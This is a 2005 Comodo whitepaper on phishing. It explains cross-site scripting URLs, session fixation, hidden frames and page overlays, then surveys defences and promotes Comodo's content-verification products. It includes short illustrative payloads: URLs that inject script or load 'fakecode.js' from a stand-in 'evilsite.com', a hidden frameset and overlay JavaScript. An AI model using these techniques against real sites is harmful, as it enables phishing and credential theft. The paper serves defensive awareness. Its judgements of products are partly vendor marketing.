The ever increasing complexity of websites with dynamic content has led to new opportunities for the phisher. Dynamic content is achieved through the use of web applications and suffer from a threat that static websites don't, called "Cross Site Scripting" (CSS, or sometimes dubbed XSS). CSS attacks succeed by maliciously altering the URL of the target e-commerce site via use of a custom URL or code injection into a web application or data field. In most cases, these CSS attacks are the result of poor web application development. CSS attacks can be carried out using several techniques, but for the specific example of phishing, the attacker must use a URL based attack.

The most popular methods of launching URL based CSS attacks include:

HTML substitution:

http://abcbank.com/ebanking?URL=http://fakesite.com/phishing/fakepage.htm

In this attack, the phisher has been allowed to replace the real URL following the legitimate ‘ebanking?’ component with his own, spoof page.

Script Content Embedding http://abcbank.com/ebanking?page=1&client=<SCRIPT>fakecode...

The wholesale insertion of malicious script into the ebanking component of the URL.

Forced loading of external scripting code http://abcbank.com/ebanking?page=1&response=evilsite.com%21fakecode.js&go=2

This method instructs the browser to open a script on the phisher’s server rather than with the site of abcbank.com

Cross Scripting in real life situation

A customer of ABC Bank has received an email asking him to update his account details by clicking on the following URL:

http://abcbank.com/ebanking?URL=http://fakesite.com/phishing/fakepage.htm

The URL has been modified by the phisher so that it connects to the legitimate bank web site, but then references a form page on an external server. This is due to weak web application coding that will accept the insertion of arbitrary URL’s, enabling the phisher to substitute the real embedded authentication page for one of his own - http://fakesite.com/phishing/fakepage.htm

Cross site scripting attack

CSS attacks are particularly dangerous because the victim has no way of know that the embedded authentication page is not genuine. The attacker could easier disguise the URL using one of the methods outlined earlier . For example,

http://fakesite.com/phishing/fakepage.htm may instead become:

http%3A%2F%2F3515261219%2Fphishing%C0%AEfakepage%2Ehtm

Preset Session Attack

HTTP and HTTPS are stateless protocols, which mean they treat each request as an independent transaction, unrelated to any previous request. Consequently, web-based applications need to ‘transfer’ information entered in one part of a session using alternative methods of tracking or managing state (eg of user authentication details and all the information entered into web form data fields up until that point.) The most common way of tracking state within a web application is through Session Identifiers (SessionID’s). These SessionID’s may be implemented through cookies, hidden fields or fields contained within page URLs.

Unfortunately, many web-based applications deploy poor state tracking systems that enable the client to define a SessionID.

The SessionID is used by the web application to track the customer’s details and submitted information but, crucially, this SessionID must be authenticated. This is (usually) done by the user logging in with a username and password. Although this login information will grant the user access to restricted content, the SessionID exists independently and can be preset by a phisher.

Typically in this type of attack, the victim will receive a link to the genuine ABC Bank server that contains a preset SessionID. All the phisher needs to do is authenticate this SessionID against a real users login details. The hacker’s system will therefore continually poll the bank’s web application server for access to restricted content such as a fund transfer page using this preset SessionID. However, until a customer authenticates the ID with his or her login details, the attacker will receive error messages.

Web Page

XSS code

13

© 2005 Comodo Inc.

Once the victim has followed the link in the email, logged into their account and made the preset SessionID ‘live’, the attacker will be able to access the restricted content. This is because the bank’s web application server will now accept any connections using the authenticated SessionID as it is the only state management element in the current session. The attacker has used a ‘brute force’ tactic of waiting for someone to authenticate his preset SessionID to access restricted content.

For example,

The phisher has sent out multiple emails to ABC Bank customers asking them to update their accounts. The supplied link contains the preset SessionID 6hJ23pw4t5cQ

https://abcbank.com/ebanking?session=6hJ23pw4t5cQ&Login=True

Meanwhile, the phisher is continually polling the bank server with the preset SessionID in the hope that a customer will authenticate it with their login details. Once this happens he can enter restricted areas such as a funds transfer page: https://abcbank.com/ebanking?session=6hJ23pw4t5cQ&Transfer=True)

Hidden Attacks

Another method of deceiving customers as to a web site’s true identity is to manipulate the physical appearance of a web page using HTML, DHTML and other scriptable code. The hacker will disguise fake content and its true source using these techniques to make customers believe they are viewing content from the genuine e-commerce site instead of content hosted on a hacker’s server. Types of hidden attack include hidden frames, overriding page content and graphical substitution.

Hidden Frames

Frames enjoy widespread cross browser support and are easy to code, making them a popular and facile candidate for the deployment of Hidden Attacks. Consider the following example where two frames have been defined. Although the first frame contains the legitimate site information, the second frame reference the attacker’s chosen content. This second frame is set to occupy 0% of the browser interface so it is invisible to the customer. However, the page referenced in the ‘hidden’ frame can contain a host of instructions to deliver external content (e.g. overriding page content or substituting graphics), capturing personal data or running key-logging or screen grabbing code.

<frameset rows="100%,*" framespacing="0">

<frame name="real" src="http://abcbank.com/" scrolling="auto">

<frame name="hiddenContent" src="http://fakesite.com/bad.htm" scrolling="auto">

</frameset>

Hidden frames may be used for:

• Hiding the source address of the attacker’s content server. Only the URL of the master frameset document will be visible from the browser interface unless the user follows a link with the target attribute site to "_top".

• Used to provide a fake secure HTTPS wrapper (forcing the browser to display a padlock or similar visual security clue) for the sites content – while still using insecure HTTP for hidden page content and operations.

• Hiding HTML code from the customer. Customers will not be able to view the hidden pages code through the standard “View Source” functions available to them.

• “Page Properties” will only indicate the top most viewable page source in most browser software.

• Loading images and HTML content in the background for later use by a malicious application.

• Storing and implementing background code operations that will report back to the attacker what the customer does in the “real” web page.

• Combined with client-side scripting languages, it is possible to replicate functionality of the browser toolbar; including the representation of URL information and page headers.

Overriding Page Content

Phishers can override existing page content such as graphics using a variety of methods. Perhaps the most popular technique in ‘superimposing’ fake content on a legitimate page is by using the DHTML command - DIV. The DIV command defines an area of the page into which content can be placed. In combination with the STYLE function, a phisher can place and absolutely position fake content on top of an organization’s real content. The fake content can be implemented on the legitimate site by a very long URL or by referencing a malicious script. For example, the following code segment contains the first three lines of a small JavaScript file (e.g. fake.js) for overwriting the pages content.

var d = document;

d.write('<DIV id="fake" style="position:absolute; left:200; top:200; z-index:2">

<TABLE width=500 height=1000 cellspacing=0 cellpadding=14><TR>');

d.write('<TD colspan=2 bgcolor=#FFFFFF valign=top height=125>');

…

Using this method, an attacker can use generate a completely spurious web page on top of the real page.

Graphical Substitution

Browsers such as Internet Explorer and Mozilla Firefox are problematic to phishers because they inherently include visual clues as to the true identity of a website. Examples are the address bar which displays the URL field, the padlock denoting SSL encryption and the zone of the page source. However, by using scripting languages such as VBScript and Java, hackers can easily place authentic looking graphics over these areas to obfuscate the actual URL with a graphic showing the URL of the legitimate organization.

In the following real world example, the phisher has sent the victim an email urging him to update his account by clicking a link included in the message body. The link leads to a fake site containing an exact copy of the real site. The phisher then carefully positions fake status bar and padlock/zone images over the browser to disguise the tell-tale information and assure the customer that the site is genuine.

14

© 2005 Comodo Inc.

The Phisher overlays a fake address bar, padlock logo and zone information over the

actual browser information.

The Phisher must use browser specific graphics (or risk overlaying an Internet Explorer address bar over a Mozilla browser) but it is relatively simple for the attacker’s fake website to determine the client’s browser software and version and prepare appropriate graphics in each instance.

This still leaves the problem that the fake graphics are ‘flat’ whereas the real browser elements would be interactive. Unfortunately, phishers can blend graphical substitution with a wide range of other browser simulation techniques such as Java script in order to fully emulate the functionality of a secure web site. These include:

• Fake Context sensitive “right-click” functionality and menus

• Presenting false popup messages just as the real browser or web application would

• Displaying fake SSL certificate details when reviewing page properties or security settings – through the use of images.

• Using simple HTML embedded commands, an attacker can hijack the entire customer’s desktop (user interface) and construct a fake interface to capture and manipulate what the customer sees. This is done using the window.createPopup() and popup.show() commands.

Observing Customer Data

Phishers can also steal confidential user information by implementing customer observation techniques. Key-loggers and screen-grabbers can observe and record data entered by a customer and then store it locally for the attacker to retrieve at a later date. The method of retrieving the data varies according to the specifics of the particular attack. One method is the by the

victim inadvertently sending a continuous stream of data using a custom data sender/receiver pair. This ‘real time’ collection of user data usually requires the attacker to maintain a connection to the victim’s computer. Alternatively, the captured data can be stored on the collected from the victim’s local computer and uploaded to the attacker’s server via FTP, HTTP, SMTP etc. Finally, the observation software could contain additional code to allow the attacker to remotely connect to the victim’s machine to collect the data at their convenience.

Key-logging

A Key-logger is a program that runs in the background, recording all the keystrokes a victim makes. Once keystrokes are logged, they can be hidden on the local machine for later retrieval or shipped raw to the attacker. The attacker then peruses them carefully in the hopes of either finding passwords, or possibly other useful information that could be used to compromise the system or be used in a social engineering attack. In the case of phishing related key-logging, the attacker will attempt to record the authentication information that a customer enters into a web application login page. This type of key-logging will usually involve client-side scripts to record key strokes only in the specific context of the web browser. This presents the phisher with a more concise and relevant set of key-strokes from which search for confidential data.

Screen Grabbing

One of the more recent attack vectors that phisher’s have developed is sophisticated code that takes a screen shot of data entered into web-based applications- particularly the areas concerning login details or other sensitive fields. In order to keep data transfer to the attacker’s server at a minimum, such software will only take a screenshot of the relevant observational area – eg just the login and password fields. This type of attack is particularly pernicious as it bypasses some the secure applications that financial organizations have developed to overcome traditional key-logging programs.

Client-side Vulnerabilities

The increased sophistication of browsers may enhance the surfing experience of users, but also represents a double edged sword in the guise of increasing vulnerabilities. With each incremental leap in functionality, there is often a corresponding increase in vulnerabilities that can be exploited by an attacker. Third party add-ons such as Flash and Real Player not only increase the potential for new security risks, but also distribute the responsibility for patching amongst more and more vendors.

User laxity is another serious concern in the battle against phishing, with home users being traditionally slow to implement vital security updates to their software- often only taking action only when something goes wrong.

15

© 2005 Comodo Inc.

IDENTITY ASSURANCE SOLUTIONS Today’s portfolio of solutions

As the previous section highlighted there are numerous attack methods available to criminals who wish to perpetrate fraud. Consequently over the last 12-18 months a number of solutions have also been bought to the market to address these issues.

These solutions can be categorized under three headings.

• Client/User

• Server/Enterprise

• Externally Managed Services, alert services

Client/User

Who is most at risk from an identity theft attack? The direct cost in most cases lies with the individual or home user targeted by the attack, as it is their bank account which is cleared out. However so far, in order to maintain their reputation in the market, most banks or enterprises have aided customers who have been duped. This cannot continue and as such the banking community and the community of solutions providers have themselves formed various groups in order to tackle the biggest problem – User education. Groups such as the AntiPhishing Workgroup (www.antiphishing.org)

The Anti-Phishing Working Group (APWG) is an industry association focused on eliminating the identity theft and fraud that result from the growing problem of phishing and email spoofing.

APWG Members

- Over 1036 members

- Over 659 companies

- 8 of the top 10 US banks

- 4 of the top 5 US ISPs

- Over 100 technology vendors

- Law enforcement from Australia, Canada, UK, USA

and others have been formed out of necessity to be able to focus efforts to educate users. March 2005 will also see the launch of ‘project endurance’ which again revolves around a major media campaign to educate users and bring confidence back.

At the client/user side insurance against identity theft can be bought, however, proactive steps can also be taken grouped as follows:-

• Desktop EndPoint Security Solutions

• Digital Signing and Validation of e-mails

• General security awareness and best practices including choice of browser technology.

Desktop – Endpoint Security Solutions.

‘Endpoint security solutions’ is the term that refers to the swathe of solutions now available to users to combat ‘malware’ (A generic term now used to describe Viruses, Spyware, Trojans and malicious code now existing on the internet). The products available to combat these issues have themselves diversified into many flavors with major vendors such as Symantec, McAfee, Microsoft and Trustix etc providing one or more solutions :-

• AntiVirus

• Personal Firewall

• Spyware detection and removal

• AntiSpam

• Intrusion Detection

• Free products including browser enhancement tools

Many end users are familiar with the concept of AntiVirus protection, however many still choose to “take a chance” and do not adequately protect themselves to the level they should, even though many providers do offer free versions. It is this level of awareness which is the biggest barrier to adoption, yet it is the complexity and sheer number of technologies available that bamboozles users into doing nothing.

As a minimum products to protect against identity assurance should have:-

• The ability to detect and block “on the fly” attempts to install malicious software (such as Trojan horses, key-loggers, screen-grabbers and creating backdoors) through email attachments, file downloads, dynamic HTML and scripted content.

• The ability to identify common Spam delivery techniques and quarantine offending messages.

• The ability to pull down the latest anti-virus and anti-spam signatures and apply them to the intercepting protection software. Given the variety in spamming techniques, this process should be scheduled as a daily activity.

• The ability to detect and block unauthorised out-bound connections from installed software or active processes. For example, if the customers host has been previously compromised the protection solution must be able to query the authenticity of the out-bound connection and verify it with the user. The difficulty here occurs when users have no actual idea what is or is not supposed to be making a call to the internet.

• The ability to detect anomalies in network traffic profiles (both inbound and outbound) and initiate appropriate counter-measures. For instance, detecting that an inbound HTTP connection has been made and substantial outbound SSL traffic begins on a non-standard port.

• The ability to block inbound connections to un-associated or restricted network ports and their services.

16

© 2005 Comodo Inc.

• The ability to identify common Spyware installations and the ability to prevent installation of the software and/or blocking outbound communications to known Spyware monitoring sites.

• Automatically block outbound delivery of sensitive information to suspected malicious parties. Sensitive information includes confidential financial details, credit card numbers, pass codes and contact information. Even if the customer cannot visually identify the true web-site that will receive the sensitive information, some off the shelf software solutions can.

Do Desktop Endpoint Security Solutions adequately protect end users? –

No. As with any layered security defense solution they defend against a

proportion of attacks.

The major barrier to adoption across both the single incidence home user segment of the market and the mass deployment enterprise market is the complexity and sheer number of solutions needed to be fully protected.

Again the number of solutions represents a significant outlay in terms of cost, time, effort and maintenance for users to initially become and then remain protected.

Digitally Signing e-mails

E-mail clients have been shaped by the demands of enterprise users to include more and more advanced features not really providing many advantages to the average home user. The mere fact that users are able to view mail in HTML format means that many URL obfuscation techniques and embedded scripting techniques succeed. Where possible the ability of e-mail clients to receive HTML should be suppressed to plain text, which although providing sometime inconsistent formatting improves significantly the security on the client machine.

Legislation is already in place such as EU Council Directive 2001/115/EC and HM Customs and Excise 700-63 for Electronic invoicing requiring the use of digitally signed mails with providers such as TrustSign offering compliancy solutions. http://www.trustsign.co.uk/products/services/700-63.html

The same is true for e-mail attachments. Common mail clients like outlook maintain a list of ‘dangerous’ file extensions .exe .pif .vbs etc. By default users should save attachments to their system and scan the files prior to opening,

but again this is driven by user awareness, especially where worms mail themselves to personal address contacts with funny jokes or other humorous attachments.

A growing proportion of the enterprises now look to encrypt sensitive corporate information en-route between mail servers. Like wise businesses are turning to digitally signed e-mail as an option to provide authenticity and integrity to messages sent to their client base, and to those customers with their own digital certificates, confidentiality.

Digitally signing e-mails involves the use of public and private keys which are used to compute hashes (fingerprints) of e-mails at the time the mail is sent. This allows S/MIME (Secure Multipurpose Internet Mail Extensions ) compatible e-mail clients such as Outlook, Eudora and Lotus to check the integrity of the e-mails.

Popular web based e-mail systems such as AOL, Hotmail, Yahoo! Mail and GMail do not support S/MIME, therefore alternatives such as PGP (Pretty Good Privacy) can be used as an alternative.

Does digitally signing an e-mail prevent identity theft? –

No. But again as with any layered security defense solution they provide a

method for customers to verify e-mail authenticity.

A major barrier to the adoption of S/MIME compliant digital certificates is the control of the keys, especially where a large scale deployment is necessary. Although some providers are now beginning to provide key-server technology to ease the burden of administration and key lifecycle management, the use of PKI has not gained the foothold in the market that it should have. Companies such as VeriSign, Thawte and Comodo offer PKI solutions to enterprises wishing to deploy certificates in volume.

Legislation however is driving the adoption rate forward with new laws now dictating that electronic communications MUST be digitally signed.

The hidden advantage in digitally signing mails is the strength of the audit trail that is created as the digital certificate is created. Certification Authorities will have records of the application process providing a stronger case for prosecution.

17

© 2005 Comodo Inc.

The disadvantage is that the “from” address, although digitally signed, still needs close inspection as the domain could still be misleading. support@abcbonk.com etc

User Education – General Security Awareness

One of the most important areas, yet one of the most difficult to address on the large scale necessary to defeat the problems is user education. Unfortunately advice given to user groups will sometimes be used by Phishers to trick users into an even deeper false sense of security. It is therefore paramount that enterprises and security service providers work together to ensure base line products and services (i.e. the browser and systems are architected to provide security to users without the need of mass user education).

The choice of Internet Browser

Within the marketing campaigns of Internet browser providers, online safety and security is seen as a major concern. With the growing choice of solutions, security is seen as one of the major decision making criteria upon which users choose to browse the internet.

Server/Enterprise

There is an ever increasing portfolio of managed services and server side identity assurance tools. These tools are available both for use by end users/customers and more appropriately by enterprises whereby proactive integration into their web based service delivery architecture together with increased end user education can limit the number of attack vectors aimed at their service. Some tools are free, some are paid and some are absolutely essential (legislation such as HIPAA, SoX and GLB driving their usage). Most operate across all browser platforms but again as with the previous set of Client Side solutions, several tools are required as a defense in depth approach.

Additional Server side solutions are discussed in the following sections.

• Client Authentication certificates

• SSL Certificates

• Site Identity Assurance Seals

• Browser enhancements – Toolbars

• Managed Identity Assurance Services

• Content Verification Certificates

Client Authentication Certificates

Client Authentication tokens such as a digital certificates, USB keyfobs/smartcards etc do provide more robust two-factor authentication methods to validate users entering a site protecting a real site from false users, but how are real users protected from false sites? If the site is a false ‘spoofed’ site then no matter what the token used or password entered the answer will always be ‘yes please enter’!

It is doubtful that the false site would gain any valuable information which would be useful in an attack against the enterprise it spoofs, but users believing they are on a legitimate site could become victims of identity theft themselves having been fooled by a false authentication login process.

18

© 2005 Comodo Inc.

Secure Socket Layer Certificates.

Established by Netscape in 1994, the SSL protocol is now widely accepted as a method of providing confidentiality, authentication and integrity for on-line transactions, companies such as Verisign and Comodo deliver high assurance certificates to individuals and organizations following a subscriber authentication process that includes verification of the organizations existence, the organizations right to use the domain name included within the certificate and the authority of the requester to obtain a certificate on behalf of the organization. The use of SSL certificates is a critical building block for secure electronic commerce and one of the most ubiquitous uses of public key infrastructure (PKI). SSL certificates provide three security services – confidentiality, authentication and integrity, enabling a user to:

• Securely communicate with a web site – Information which the user then provides cannot be intercepted in transit (confidentiality) or altered without detection (integrity)

• Verify that the site is actually the companies web site and not an imposters site (authentication)

For example, an SSL certificate with the organizational name “ABC Software Inc.” is intended to provide assurance that the Web site being viewed (e.g. www.abcsoftware.com) is actually an ABC Software Inc Web site (and not a “spoofed” site created specifically by another unrelated entity to trick unsuspecting web surfers into doing business with someone pretending to be ABC Software Inc.)

Why is this important? A domain name URL (uniform resource locator) is equivalent to a telephone number. It is assigned to a paying customer (organization or individual) for the period of time it is registered.

The domain name system was designed to support open-systems information flow. While there are restrictions on certain types of domains (e.g. .mil is restricted to military entities, .fr is restricted to organizations physically located in France), there are no such restrictions on (.com .org, .net and others). To register for these types of domains the individual or organization need only pay an annual fee. There is no requirement for registrars to verify the accuracy of the information provided.

The importance of providing assurance to a growing Internet population of more than 1 Billion individuals is paramount. The architecture of leading Internet browsers available from Microsoft®, Netscape®, Opera® and others has been constructed in such a way as to provide assurance through the use of simple icons (in the form of locks and keys). However, changes in the SSL certificate marketplace pose a security risk with a potential threat to consumer confidence in the security of online commerce.

Authentication of an organization

Providers of low assurance SSL certificates do not perform all the necessary checks, choosing instead to offer a reduced cost, rapid fulfillment model. These lower-assurance SSL providers provide confidentiality and integrity, but not authentication. This is in direct conflict to accepted industry practice and serves as a source of confusion for internet users. Whereas in the past it was merely acceptable to rely on the lock symbol, users must now examine and understand the contents of the SSL certificate, in order to distinguish between the varying levels of assurance. In some cases users may need to refer back to the CPS (Certificate

Practice Statement) to be able to understand the level of assurance provided.

Industry standards for subscriber registration require that a certification authority (CA) maintains controls to provide reasonable assurance that:

• Subscribers are properly identified and authenticated

• Subscriber certificate requests are accurate, authorized and complete.

A certification authority’s code of practice is detailed in a CPS (Certificate Practice Statement) or disclosed within the CA’s published certificate policy (CP). There are three fundamental verification steps necessary to be able to issue an SSL certificate to an organization:

• Domain ownership – Does the organization or individual have the right to use the Domain identified on the certificate.

• Confirmation of legal status – Is the organization a legal entity.

• Confirmation of the requestor’s authorization – Does the individual making the request have authorization from the organization on whose behalf they are making the request.

The importance of the validation steps are identified in the risk table on the following page. In general, an internet user incurs a higher risk if verification steps are not performed.

In each example scenario, the failure to complete the specified checks could expose:

• Unsuspecting Internet users to direct financial loss due to fraud.

• The legitimate organization to direct financial loss due to fraud, or undue business risk and loss or productivity, or public relations, or legal action.

• The certification authority to undue business risk, bad public relations or legal action

19

© 2005 Comodo Inc.

Can SSL on its own provide identity assurance?

No. With several alternative assurance levels and no differentiation methods

available to the end user, it is not possible to see which level is appropriate for which

Internet activity.

Internet Explorer does not differentiate between high and low assurance certificates. Even more recent browsers like Firefox, although displaying the Signatory authority, require in-depth analysis of the certificate itself.

EXAMPLE SCENARIO

RISK OR THREAT POSED

• No authentication of the

organization by the CA

or • No check of the applicant’s right to

use the domain name

A malicious individual operating a spoofed web site tries to masquerade as an existing

organization, thus deceiving Internet users into believing that the individual’s web site is

operated under the auspices of an existing organization whose name is included in the SSL

certificate. This then creates a false level of trust by association between the malicious

individual and the legitimate organisation.

• No check of the organization’s

existence by the CA

A malicious individual could pretend to be an organization even though no such organization

exists (i.e. the articles of incorporation or business documents have not been registered with

the appropriate government body)

• No check of the applicant’s identity

and authority to request a certificate

for the organization by the CA

A malicious individual who is not authorized by the organisation could obtain an SSL certificate

bearing the organization’s name, allowing the malicious individual to masquerade as the

organization

20

© 2005 Comodo Inc.

Site Identity Assurance Tools

SSL providers (Certification Authorities) also provide Site Identity Assurance Tools in the form of site seals, for example:-

Users then either point at the logo to gain additional site information and assurance (In the case of Comodo’s Point to Verify Trustlogo technology) or click on the logo to open a new window to gain that assurance. The windows will have https connections with trusted third party databases (Not controlled by the site) to present users with appropriate site identity credentials.

Can a site seals provide identity assurance? –

Yes. Positive identity assurance can be provided on the assumption that the site

seal cannot be spoofed and users are educated on what specifically to look for.

However, as has been shown in the previous sections, graphics and content can be spoofed by phishers, meaning that other security measures must be included, for example a ‘real time’ date/time stamp displayed as part of the assurance data window etc.

As with all solutions presented in this section, the overall effectiveness of the solution is more apparent when used in combination with other solutions.

Toolbars

Toolbars come in a variety of shapes and sizes, from simple navigation aids to security enhancements, removing pop-ups etc. Toolbars backed by databases have gained popularity, however the effectiveness of any solution is dependant on the database used, its coverage and depth of information on each URL.

The Internet Explorer platform currently used by 90-95% of the Internet community is far too flexible allowing ‘true’ tool bars to be switched off and replaced with spoofed toolbars on the sites themselves, not only negating the value of the toolbar solution in the first place but actually providing additional ‘false assurance’ to a potential victim!

Phishing attacks also use ‘real’ sites to legitimize the false site, opening a pop-up window at the front of a legitimate business. (See page 6) and unless the toolbar is included within the ‘pop-up window’ users are unable to determine which site the pop-up is hosted from.

Can a toolbar powered from a comprehensive URL Database provide identity assurance? –

Yes. Positive identity assurance can be provided if the toolbar cannot be

disabled (and therefore spoofed). Users are able to make an informed decision on the legitimacy of a web site not covered

by any sites not in the toolbar database.

$69Yes128-bitComodo

$99Yes128-bitDigiCert

$99Yes128-bitSSL.com

$128Yes128-bitXRampSSL

$149Yes128-bitEnTrust

$159Yes128-bitQualitySSL

$159Yes128-bitGeoTrust

$199Yes128-bitThawte

$214Yes128-bitGlobalSign

$349Yes128-bitBetrusted

$895Yes128-bitVeriSign

PriceSealLevelProviders

$69Yes128-bitComodo

$99Yes128-bitDigiCert

$99Yes128-bitSSL.com

$128Yes128-bitXRampSSL

$149Yes128-bitEnTrust

$159Yes128-bitQualitySSL

$159Yes128-bitGeoTrust

$199Yes128-bitThawte

$214Yes128-bitGlobalSign

$349Yes128-bitBetrusted

$895Yes128-bitVeriSign

PriceSealLevelProviders

21

© 2005 Comodo Inc.

Managed Identity Assurance Services

Validating personal communications like adding name, credit card numbers **** **** **** 4343 etc rather than ‘Dear Sir’ or ‘Dear Valued customer’ is a popular method to provide e-mail assurance. Two popular web-based managed services take this step one stage further presenting personal information to the user during a transaction. VERIFIED by VISA

Whenever you make a purchase (1) at a merchant that supports the Verified by Visa program, the merchant requests the central Visa Directory Server (2) to check with your issuer if your card is enrolled to the service.

If the issuer indicates that you are enrolled, then your browser is automatically redirected (3) to the issuer’s ACS address, along with the relevant purchase information.

The ACS will now present a Verified by Visa receipt on your browser (4). The receipt includes purchase details, and you are prompted to type your secret password. Once confirming the receipt with your password and passing authentication (5), the issuer will digitally sign the receipt and redirect your browser to the merchant’s Thank You page (6).

MASTERCARD SECURECODE

When purchasing at a merchant that supports the SPA program (1), a receipt will pop up at the checkout page (2) presenting the purchase details. At this point you are also asked to authenticate with a secret password (3).

The information is sent to the server (4), which verifies your identity and generates a unique authentication code. It returns the UCAF code and your MasterCard number, expiry date and name-on-card (5). These are automatically populated by the wallet (6) at the checkout page.

The merchant will now perform a regular authorization request, which includes the unique authentication code (7). When it reaches your card issuer, a UCAF validity check is performed to assure that the transaction is genuine.

Are these identity assurance methods fool proof against a man in the middle attack? –

No. Without identity assurance methods to verify either the identity of the site or

its contents man in the middle attacks can still be launched.

If ‘Bad Bob’ sits in the middle hosting a completely spoofed web site, he is able to piggy back on the ‘real’ Verified by Visa or the real ‘Mastercard Securecode’ process and pass selective information to the Cardholder.

Bad Bob does not need to be enrolled into any of the VbV programs, he just needs to know a provider that is. There is no way for a cardholder to validate if he is on Bad Bobs site when he begins the process. – There is no assurance of the initial site and therefore no assurance in the process. Effectively Bad Bob can proxy information back and forth to the customer as he sees fit, monitoring the information, gaining user passwords in the process.

22

© 2005 Comodo Inc.

Why is it possible to launch this type of attack?

This is possible today because until now there is no accepted verification method available to ensure that the content of the browser window is allowed to exist on the web page on which it appears.

(As easy as cut and paste)

End users are not able to ascertain if the content actually related to the site - anyone can cut and paste! Therefore graphics passed by Bad Bob through his site could convince and end user that he was a legitimate business.

And so in returning to the preface summary:-

‘don’t believe anything you see’ How is it possible to protect the content of a web page?

Content Verification For content to become ‘verifiable’ by the user it must be:-

1) Suitably complex such that it cannot easily be spoofed (No cut and paste possibilities)

2) Directly linked (bound) to the web page (URL and or IP) upon which it is to be displayed

3) Given a validity period related to its usage.

‘VerificationEngine’ the patented browser plug-in for Internet Explorer from Comodo allows users to verify that a digitally signed element of content can exist on an approved web page.

For example, which website below is legitimate and which is not? (Bearing in mind all the attack vectors discussed in previous sections.)

Web Site ‘A’ Web Site ‘B’

A verification process (A process that is initiated by the user and not the web server) allows any digitally signed content bound to a specific URL/IP to be rendered onto the display in a different way to all other ‘non verified elements, easily highlighting trusted elements.

So in the example of the web site above, the ‘real’ web site would display trusted logos highlighted, where as the ‘spoofed’ site would not be able to and would display all elements as ‘un-trusted’. This is shown in more detail in the summary section.

Can “Content Verification” provide identity assurance? –

Yes. The other advantage of content verification is that other tools such as site seals, toolbars, managed services,

brands, logos etc can also all be protected and extending the protection

from graphics to HTML allows for trusted Navigation, trusted Login boxes and

Trusted pay/buy buttons.

23

© 2005 Comodo Inc

What are Content Verification Certificates? Content Verification Certificates (CVC) facilitate the verification of “web page content”. As an X509 compliant certificate type, CVCs are created, distributed, and revoked using proven PKI (Public Key Infrastructure) methods to provide the highest level of security for web page content. Facilitating the deployment of verified login boxes, verified navigation panes, verified trade marking / branding and verified accreditation/association. These examples are shown below where content is either displayed in the ‘raw’ untrusted state as a graphic or HTML, or as a trusted element extracted from the certificate.

Web page prior to Verification Web page during Verification

VerificationEngine™ – A free tool for Internet Explorer.

VerificationEngine enhances the capabilities of the ubiquitous Internet Explorer web browser to that of a true trusted business tool - verifying SSL connectivity protecting the browser toolbars whilst at the same time extracting and displaying the contents of any valid CVCs. As have been shown in the previous sections the only way to combat fraudulent/spoofed websites is to ratify by a test that site elements are verified - this requires the verification to take place outside of the browser so that the fraudster can have no input into the results. VerificationEngine will indicate that the site is legitimately able to display logos such as credit card icons (for online purchasing) and that the site is secured by SSL. It does so in a highly visible manner that is intuitive, fast and user customizable for even higher levels of security.

Content Verification Certificates allow verification of web site content. The

content requiring protection is digitally bound within an X509 certificate also

holding location information. A compliant viewer is able then to

extract the information and display the information through web browser

independent techniques.

External event Indicator

Protection of Trademarks and Identity – Verification of

the ownership of the URL and Trademark

Secure Download button allowing code to be

downloaded from the URL

Secure LOGIN – Signed HTML ensuring the correct routing of

username and password

Signed HTML (Links) allowing trusted navigation

to alternative parts of the site

Secure 3rd Party Trademark or site seal verifying a link between site URL and the identity behind the logo

Web page contents are extracted from the CVC certificates and pulled through the

Content Guard by Verification Engine. Any overlap of content (even by a single pixel)

voids the verification process.

Verified Content Layer

Content Guard

Company information, URL and Content is supplied to a Validation Authority who

validates all aspects of the submission.

Signed Content in the form of a CVC is then returned to the Company to be displayed on the company web site.

Trusted Content can be viewed by

customers with the VerificationEngine™ viewer.

24

© 2005 Comodo Inc

SUMMARY

‘Don’t believe anything you see’ was the conclusion to the Preface. But in saying this, how then will the Internet economy survive in the long term? $Billons of trade moves across the Internet every day, yet as more organizations provide greater online access for their customers, professional criminals see the Internet as a potential goldmine of opportunities. As the internet evolves with greater functionality and a greater numbers of services added to it, so the number of potential loop holes increase. In January 2005 we’ve now seen whole web sites copied by attackers, automated BOTs clone pages and spawn spam to lure victims. We’ve seen malware attacks featuring viruses attached to jpeg files and advanced Trojan/Virus Phishing techniques with the malware lying dormant on a system until a banking site is identified and then keylogging critical data. Attacks are now also running scripts to alter bookmarks…..and so the list goes on.

By understanding the tools and technologies criminals use within their arsenal, businesses and their customers can take a proactive stance in defending against future attacks. By applying a multi-tiered approach to their security model (client-side through managed services to server-side) enterprises can easily manage their protection technologies against today’s and tomorrow’s threats. In the end, identity assurance on the Internet relies heavily on being able to “verify” content being displayed. Browser providers hold the key to the technical solutions necessary to fuel the success of the Internet and as such provide the means to solve many of the problems seen today. Enterprises have a duty to educate their end users, whilst continually assessing and implementing additional security technologies into their on-line services.

The final solution will be a multilayered approach both on the client machines and on web servers themselves. Browser Providers should look to the following areas during future developments of the browser architecture:-

• To provide clear differentiation between high assurance and low assurance SSL communication sessions.

• To provide real time access to a globally recognized trusted third party databases that provide web site identity assurance.

• To provide content verification techniques facilitating brand protection, legitimate logo usage and identity assurance.

In the interim period security innovators, Certification Authorities and service providers need to create/develop tools, technologies and services to plug these holes. By solving these issues the Internet will evolve into the secure communications mechanism it was meant to be, providing a safe global trading environment for enterprises of all sizes.

Comodo provides a complete range of browser enhancement tools, endpoint security solutions, managed services and security technologies to address many of the areas highlighted within this paper. For more information on specific solutions please refer to the following sites.

CVC - Content Verification Certificates – http://www.contentverification.com

Vengine – Verification Engine – High Assurance SSL and CVC viewer http://www.vengine.com

Trustlogo – Real time web site identity assurance for businesses http://www.trustlogo.com

TrustToolbar – Real time web site identity assurance for consumers http://www.trusttoolbar.com

IDAuthority - Mapping the physical world to the virtual world http://www.idauthority.com

SSL - High Assurance SSL/TLS web server certificates http://www.enterprisessl.com

Security - Security solutions, cryptographic and encryption solutions http://www.comodo.com

Anti Virus - Endpoint Security Solutions, AntiVirus, AntiSpam, Firewall http://www.trustix.com

© 2005 Comodo Inc. All rights Reserved. No part of this publication may be reproduced or distributed in any form or by any means, or stored in a database or retrieval system, without the prior written permission of the publisher.

Steve Roylance – Technical Marketing Director – Comodo

Seemant Sehgal – Security Analyst - Comodo

Comodo

US Headquarters 525 Washington Blvd, Jersey City,

NJ 07310, USA Tel Sales: +1 800 772 5185 Fax Sales: +1 646 442 3760

Canadian Tel Sales: +1 877 80 32 556 sales@comodo.com

Comodo EMEA Headquarters

New Court, Regents Place, Regent Road Manchester, M5 4HB, United Kingdom

